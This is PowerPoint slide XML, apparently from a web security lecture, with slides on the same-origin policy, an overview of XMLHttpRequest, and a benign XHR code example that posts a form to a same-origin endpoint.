          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ex: SOP for http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>test.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F2C967-2F2B-1C46-BC93-374781412979}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr lvl="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Content Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D976C52-75C8-2A47-AF95-1FD979AAF442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="1600200"/>
            <a:ext cx="11373415" cy="5105400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAEB92FA-AF03-4944-BB95-CD9EA6FF4640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5446241" y="2307311"/>
            <a:ext cx="6336465"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4F309C-3C15-4241-8B73-C05C0610F834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="2881131"/>
            <a:ext cx="4480423"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A8F1E8-4EB9-4DE6-BC7B-F0A9C0F31A53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273176" y="2893664"/>
            <a:ext cx="6336465"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E5B6D4-B104-4F22-AB8E-226EB29334EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="3480017"/>
            <a:ext cx="4480423"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CD5917D-A704-4FBD-9B06-1B466EF985EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273176" y="3492550"/>
            <a:ext cx="6336465"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4733DA-E231-4019-B61D-755FFB9D3FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="4060940"/>
            <a:ext cx="4480423"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AEFFD2-EDD8-402E-967E-0F8738DA3C2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273176" y="4073473"/>
            <a:ext cx="6336465"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6F20F1-C0A7-4FEF-944F-8607D9CB51FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="4750042"/>
            <a:ext cx="4480423"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98F06B-E29A-466A-900A-5AD6047F5317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273176" y="4762575"/>
            <a:ext cx="6336465"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39E3D56-B1F5-4B96-8918-020E1CE67E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="5553464"/>
            <a:ext cx="4480423"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7B606D-5D18-4A4C-A8BD-8F44A8833178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273176" y="5565997"/>
            <a:ext cx="6336465"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E8F8211-0CC5-4977-81A5-3279BA83A758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409292" y="6170813"/>
            <a:ext cx="4480423"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7E64EA7-84EC-47BE-9BA3-750BCABD1E76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5273176" y="6183346"/>
            <a:ext cx="6336465" cy="472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15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0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">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1" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">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1" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">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1" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">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1" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">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1" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">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6" name="Shape 406"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4500"/>
              <a:t>XMLHttpRequest (XHR)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Shape 407"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Introduced by Microsoft in 1999</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>API for asynchronous network requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> in JavaScript</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Browser-specific API (still</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> to this day</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Often abstracted via a library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> (e.g., jQuery)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>SOP restrictions apply (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>with some exceptions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Typical workflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Handle client-side event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> (e.g., button click)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Invoke XHR to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Load data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>from server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>(HTML, XML, JSON)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Document Object Model (DOM)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Shape 40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984"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4261224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2" name="Shape 412"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4500"/>
              <a:t>XHR Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Shape 413"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1485987"/>
            <a:ext cx="10515600" cy="4973281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRP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sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xfer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRP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endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRP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sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="35A327"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRP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en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>$(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xfer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>).submit(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>form_obj</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRP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nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>		var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>new XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>();</a:t>
            </a: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nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr.open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘POST’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘/xfer.php’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a: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nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
